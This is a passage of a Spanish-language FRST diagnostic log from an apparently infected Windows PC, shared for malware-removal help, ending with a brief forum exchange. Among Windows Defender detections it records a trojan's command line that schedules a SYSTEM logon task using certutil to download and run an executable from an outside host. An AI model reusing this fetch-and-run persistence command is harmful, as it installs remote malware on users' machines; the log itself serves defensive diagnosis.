2020-06-11 12:56 - 2020-06-11 12:56 - 092323328 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5WebEngineCore.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 005560832 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Widgets.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 000463360 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5WinExtras.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 000188416 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Xml.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 002888704 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5XmlPatterns.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000053760 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000059392 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\qtgraphicaleffectsplugin.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000017408 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000287232 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls.2\qtquickcontrols2plugin.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000329216 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000136192 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000089088 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000312320 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick\Templates.2\qtquicktemplates2plugin.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000017920 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2020-07-11 17:41 - 2020-07-11 17:41 - 000085504 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\QtWebEngine\qtwebengineplugin.dll
==================== Alternate Data Streams (Lista blanca) ========
(Si una entrada es incluida en el fixlist, solamente los ADS serán eliminados.)
AlternateDataStreams: C:\Users\Hetitor:.repos [616626]
AlternateDataStreams: C:\ProgramData\TEMP:2CB9631F [134]
AlternateDataStreams: C:\ProgramData\TEMP:C0DFB793 [133]
==================== Modo Seguro (Lista blanca) ==================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Asociación (Lista blanca) =================
(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado.)
HKLM\...\regfile\DefaultIcon: C:\Users\Public\Documents\Stardock\IconPackager\Junior\Junior Icon 95.ico,0 <==== ATENCIÓN
HKLM\...\batfile\DefaultIcon: C:\Users\Public\Documents\Stardock\IconPackager\Junior\Junior Icon 84.ico,0 <==== ATENCIÓN
HKLM\...\cmdfile\DefaultIcon: C:\Windows\SysWow64\imageres.dll,-68 <==== ATENCIÓN
==================== Internet Explorer sitios de confianza/restringidos ==========
==================== Hosts contenido: =========================
(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)
2019-03-19 01:49 - 2019-03-19 01:49 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts
==================== Otras Áreas ===========================
(Actualmente no existe una corrección automática para esta sección.)
HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Hetitor\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 200.49.130.52 - 200.42.4.199
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Firewall de Windows está habilitado.
==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==
(Si una entrada es incluida en el fixlist, será eliminada.)
HKLM\...\StartupApproved\StartupFolder: => "Lotus Organizer EasyClip.lnk"
HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\...\StartupApproved\Run: => "Opera Browser Assistant"
==================== Reglas de firewall (Lista blanca) ================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
FirewallRules: [TCP Query User{B996C2D5-CDA4-4F68-9424-8BD6A33B2684}C:\program files (x86)\ditto\ditto.exe] => (Allow) C:\program files (x86)\ditto\ditto.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{B79ADD6A-CABB-4206-965F-9B814C010C4B}C:\program files (x86)\ditto\ditto.exe] => (Allow) C:\program files (x86)\ditto\ditto.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{7AAB24F0-2153-4B06-B7E1-87C5B4A2A7A8}C:\program files\amd\cnext\cnext\radeonsoftware.exe] => (Allow) C:\program files\amd\cnext\cnext\radeonsoftware.exe (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
FirewallRules: [UDP Query User{C90DF2C1-E1F8-45FD-8CCD-3126BC243F20}C:\program files\amd\cnext\cnext\radeonsoftware.exe] => (Allow) C:\program files\amd\cnext\cnext\radeonsoftware.exe (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
FirewallRules: [TCP Query User{4FD080F6-3ED2-490C-9DC9-86AA7949297A}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [UDP Query User{7D0D4D0E-E97E-4AE6-B8CD-32AAE37861E5}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{18AD6A9D-CD02-40DF-A77A-BE2F9FE16DAF}C:\program files\windowsapps\spotifyab.spotifymusic_1.140.508.0_x86__zpdnekdrzrea0\spotify.exe] => (Allow) C:\program files\windowsapps\spotifyab.spotifymusic_1.140.508.0_x86__zpdnekdrzrea0\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{1CC310E1-3D45-4F98-AF20-5F4CBB1E7A23}C:\program files\windowsapps\spotifyab.spotifymusic_1.140.508.0_x86__zpdnekdrzrea0\spotify.exe] => (Allow) C:\program files\windowsapps\spotifyab.spotifymusic_1.140.508.0_x86__zpdnekdrzrea0\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8DD59B99-A672-4E12-B76C-7F3B80501D85}] => (Allow) C:\Program Files (x86)\Download Studio\dstudio-gui.exe () [Archivo no firmado]
FirewallRules: [{ECBFE01A-D1E0-47CB-A153-EE3FE398B77F}] => (Allow) C:\Program Files (x86)\Download Studio\dstudio.exe (GRAND MEDIA, TOV -> Grand Media LLC)
FirewallRules: [{97B0750C-4480-472D-85A6-1D4B05FD899E}] => (Allow) C:\Program Files (x86)\Download Studio\QtWebEngineProcess.exe (The Qt Company Oy -> )
FirewallRules: [{B44E7836-3953-45C8-AA60-EB189B5A10C4}] => (Allow) C:\Program Files (x86)\Download Studio\dstudio-gui.exe () [Archivo no firmado]
FirewallRules: [{8321A3C7-7A65-4C6D-9377-98CDE3F3FAFC}] => (Allow) C:\Program Files (x86)\Download Studio\dstudio.exe (GRAND MEDIA, TOV -> Grand Media LLC)
FirewallRules: [{F57FC2EA-8806-4059-BC40-9C9D6F5D9E59}] => (Allow) C:\Program Files (x86)\Download Studio\QtWebEngineProcess.exe (The Qt Company Oy -> )
FirewallRules: [{3514D7D4-E713-4B1F-A150-07BB4AAADD9C}] => (Allow) C:\Utilitarios\FormatFactory\FormatFactory.exe (暇光软件科技(上海)有限公司 -> Free Time Co., Ltd.)
FirewallRules: [TCP Query User{111A6DEF-2928-46FE-B83D-2F11D74E0DFB}H:\utilitarios\ditto\ditto.exe] => (Allow) H:\utilitarios\ditto\ditto.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{8F14CA1B-D71F-4D1E-A17C-305F689CDA4A}H:\utilitarios\ditto\ditto.exe] => (Allow) H:\utilitarios\ditto\ditto.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{CBF3B0B3-4718-4F93-9B2B-88E088D153FB}H:\hector\bitspirit\bitspirit.exe] => (Allow) H:\hector\bitspirit\bitspirit.exe (LANSPIRIT.NET) [Archivo no firmado]
FirewallRules: [UDP Query User{C909F129-6940-45DC-9194-80DA59A5B2E9}H:\hector\bitspirit\bitspirit.exe] => (Allow) H:\hector\bitspirit\bitspirit.exe (LANSPIRIT.NET) [Archivo no firmado]
==================== Puntos de Restauración =========================
23-08-2020 19:19:40 Instalado VIDBOX VHS to DVD 9.0 Deluxe
23-08-2020 21:20:32 Revo Uninstaller Pro's restore point - VIDBOX VCDE Driver
23-08-2020 21:36:34 Revo Uninstaller Pro's restore point - VCD01 USB AV Capture
24-08-2020 20:17:28 Instalador de Módulos de Windows
26-08-2020 17:58:06 Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127
27-08-2020 15:58:47 Revo Uninstaller Pro's restore point - GridinSoft Anti-Malware
27-08-2020 18:50:56 Revo Uninstaller Pro's restore point - GridinSoft Anti-Malware
30-08-2020 19:06:59 Instalador de Módulos de Windows
01-09-2020 10:24:13 Revo Uninstaller Pro's restore point - Opera Stable 70.0.3728.133
02-09-2020 09:05:40 Revo Uninstaller Pro's restore point - GridinSoft Anti-Malware
==================== Dispositivos defectuosos en el Administrador de dispositivos ============
==================== Errores del registro de eventos: ========================
Errores de aplicación:
==================
Error: (09/02/2020 09:12:45 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
hr=0xC004F074
Argumentos de línea de comandos:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (09/02/2020 09:12:24 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
hr=0xC004F074
Argumentos de línea de comandos:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=UserLogon;SessionId=1
Error: (09/02/2020 09:01:44 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
hr=0xC004F074
Argumentos de línea de comandos:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=NetworkAvailable
Error: (09/02/2020 09:01:00 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
hr=0xC004F074
Argumentos de línea de comandos:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=UserLogon;SessionId=6
Error: (09/01/2020 11:50:38 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "H:\Graficadores\tintii\tintii.exe".
No se encontró el ensamblado dependiente Microsoft.VC90.OpenMP,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.8".
Use sxstrace.exe para obtener un diagnóstico detallado.
Error: (09/01/2020 06:55:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: natspeak.exe, versión: 15.30.0.141, marca de tiempo: 0x5b2aa308
Nombre del módulo con errores: MSVCR110.dll, versión: 11.0.51106.1, marca de tiempo: 0x5098858e
Código de excepción: 0xc0000409
Desplazamiento de errores: 0x000a326c
Identificador del proceso con errores: 0x23d0
Hora de inicio de la aplicación con errores: 0x01d680aaa8e3a675
Ruta de acceso de la aplicación con errores: E:\Program Files (x86)\Nuance\NaturallySpeaking15\Program\natspeak.exe
Ruta de acceso del módulo con errores: E:\Program Files (x86)\Nuance\NaturallySpeaking15\Program\MSVCR110.dll
Identificador del informe: a65ae9da-7951-4ea4-a56f-a994e5dc7ac5
Nombre completo del paquete con errores:
Identificador de aplicación relativa del paquete con errores:
Error: (09/01/2020 06:55:52 PM) (Source: DragonLog) (EventID: 0) (User: )
Description: Event-ID 0
Error: (09/01/2020 06:55:52 PM) (Source: DragonLog) (EventID: 0) (User: )
Description: Event-ID 0
Errores del sistema:
=============
Error: (09/02/2020 09:19:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: El servicio wuauserv se cerró con el siguiente error:
El sistema no puede encontrar el archivo especificado.
Error: (09/02/2020 09:19:55 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: El servidor {E60687F7-01A1-40AA-86AC-DB1CBF673334} no se registró con DCOM dentro del tiempo de espera requerido.
Error: (09/02/2020 09:17:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: El servicio wuauserv se cerró con el siguiente error:
El sistema no puede encontrar el archivo especificado.
Error: (09/02/2020 09:17:55 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: El servidor {E60687F7-01A1-40AA-86AC-DB1CBF673334} no se registró con DCOM dentro del tiempo de espera requerido.
Error: (09/02/2020 09:15:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: El servicio wuauserv se cerró con el siguiente error:
El sistema no puede encontrar el archivo especificado.
Error: (09/02/2020 09:15:55 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: El servidor {E60687F7-01A1-40AA-86AC-DB1CBF673334} no se registró con DCOM dentro del tiempo de espera requerido.
Error: (09/02/2020 09:13:55 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: El servicio wuauserv se cerró con el siguiente error:
El sistema no puede encontrar el archivo especificado.
Error: (09/02/2020 09:13:55 AM) (Source: DCOM) (EventID: 10010) (User: TRABAJO)
Description: El servidor {E60687F7-01A1-40AA-86AC-DB1CBF673334} no se registró con DCOM dentro del tiempo de espera requerido.
Windows Defender:
===================================
Date: 2020-09-01 11:02:29.890
Description:
El examen de Antivirus de Windows Defender se detuvo antes de completarse.
Id. de examen: {50938939-B047-4829-8090-E2360C84E1E0}
Tipo de examen: Antimalware
Parámetros de examen: Examen rápido
Usuario: NT AUTHORITY\SYSTEM
Date: 2020-08-25 19:08:32.798
Description:
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Tiggre!rfn&threatid=2147723625&enterprise=0
Nombre: Trojan:Win32/Tiggre!rfn
Id.: 2147723625
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\Hetitor\AppData\Local\Temp\Rar$EXa7252.13994\InPixio Photo Clip 7 Full AmazingTv\InPixio Photo Clip 7 en Español xSHxAmazingTv\nGen\Keygen.exe
Origen de detección: Equipo local
Tipo de detección: Concreto
Origen de detección: Protección en tiempo real
Usuario: DESKTOP-7O23KFE\Hetitor
Nombre de proceso: H:\Utilitarios\WinRAR\WinRAR.exe
Versión de inteligencia de seguridad: AV: 1.321.2090.0, AS: 1.321.2090.0, NIS: 1.321.2090.0
Versión de motor: AM: 1.1.17300.4, NIS: 1.1.17300.4
Date: 2020-08-24 20:58:07.396
Description:
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nombre: Trojan:Win32/Ceprolad.A
Id.: 2147726914
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Hetitor\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Hetitor\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Origen de detección: Desconocido
Tipo de detección: Concreto
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.321.2090.0, AS: 1.321.2090.0, NIS: 1.321.2090.0
Versión de motor: AM: 1.1.17300.4, NIS: 1.1.17300.4
Date: 2020-08-24 14:00:33.665
Description:
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:HTML/CoinMiner&threatid=2147743857&enterprise=0
Nombre: Trojan:HTML/CoinMiner
Id.: 2147743857
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_E:\ProgramData\IObit\Smart Defrag\Downloader\SD6\ASCSetup.exe
Origen de detección: Equipo local
Tipo de detección: FastPath
Origen de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de inteligencia de seguridad: AV: 1.321.2090.0, AS: 1.321.2090.0, NIS: 1.321.2090.0
Versión de motor: AM: 1.1.17300.4, NIS: 1.1.17300.4
Date: 2020-08-24 12:46:57.855
Description:
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para más información, consulta lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ranumbot!MSR&threatid=2147755365&enterprise=0
Nombre: Trojan:Win32/Ranumbot!MSR
Id.: 2147755365
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\TDSSKiller_Quarantine\24.08.2020_12.44.10\susp0001\svc0000\tsk0000.dta
Origen de detección: Equipo local
Tipo de detección: Concreto
Origen de detección: Protección en tiempo real
Usuario: DESKTOP-7O23KFE\Hetitor
Nombre de proceso: C:\Users\Hetitor\AppData\Local\Temp\{60C5F567-D85B-402C-8DC0-D44F7F49C2A7}\{25FD9E94-3CB2-4D4F-B9C4-FAE7291BDBE6}.exe
Versión de inteligencia de seguridad: AV: 1.321.2090.0, AS: 1.321.2090.0, NIS: 1.321.2090.0
Versión de motor: AM: 1.1.17300.4, NIS: 1.1.17300.4
CodeIntegrity:
===================================
Date: 2020-08-30 22:56:38.958
Description:
Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume6\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
Date: 2020-08-30 22:55:45.905
Description:
Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume6\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
Date: 2020-08-30 22:55:44.696
Description:
Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume6\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
Date: 2020-08-30 22:55:29.527
Description:
Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume6\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
Date: 2020-08-30 22:55:29.512
Description:
Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume6\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
Date: 2020-08-30 22:54:27.513
Description:
Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume6\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
Date: 2020-08-30 22:54:15.109
Description:
Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume6\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
Date: 2020-08-30 22:54:15.089
Description:
Code Integrity determined that a process (\Device\HarddiskVolume6\Program Files (x86)\Microsoft\Edge\Application\msedge.exe) attempted to load \Device\HarddiskVolume6\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
==================== Información de la memoria ===========================
BIOS: American Megatrends Inc. 2.50 04/20/2020
Placa base: Micro-Star International Co., Ltd. A320M-A PRO MAX (MS-7C52)
Procesador: AMD Ryzen 5 3400G with Radeon Vega Graphics
Porcentaje de memoria en uso: 22%
RAM física total: 14284.27 MB
RAM física disponible: 11002.34 MB
Virtual total: 16460.27 MB
Virtual disponible: 11527.43 MB
==================== Unidades ================================
Drive c: (SSD) (Fixed) (Total:930.95 GB) (Free:860.25 GB) NTFS
Drive e: (RAIZ) (Fixed) (Total:150.2 GB) (Free:23.19 GB) NTFS ==>[sistema con componentes de arranque (obtenido de unidad)]
Drive f: (ex "D") (Fixed) (Total:931.51 GB) (Free:366.72 GB) NTFS
Drive g: (ex "E") (Fixed) (Total:116.19 GB) (Free:64.27 GB) NTFS
Drive h: (ex F) (Fixed) (Total:199.38 GB) (Free:103.89 GB) NTFS
\\?\Volume{6c0708a8-0000-0000-0000-100000000000}\ (Reservado para el sistema) (Fixed) (Total:0.57 GB) (Free:0.16 GB) NTFS
==================== MBR & Tabla de particiones ====================
==========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: D2376DFC)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=0F Extended)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: A6F5A6F5)
Partition 1: (Active) - (Size=150.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=116.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=199.4 GB) - (Type=07 NTFS)
==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 6C0708A8)
Partition 1: (Active) - (Size=579 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.9 GB) - (Type=07 NTFS)
==================== Final de Addition.txt =======================
Hola
Conoces este programa? Lo hasinstalado tu?
FTWeak
Un saludo
no, ni idea de que se trata…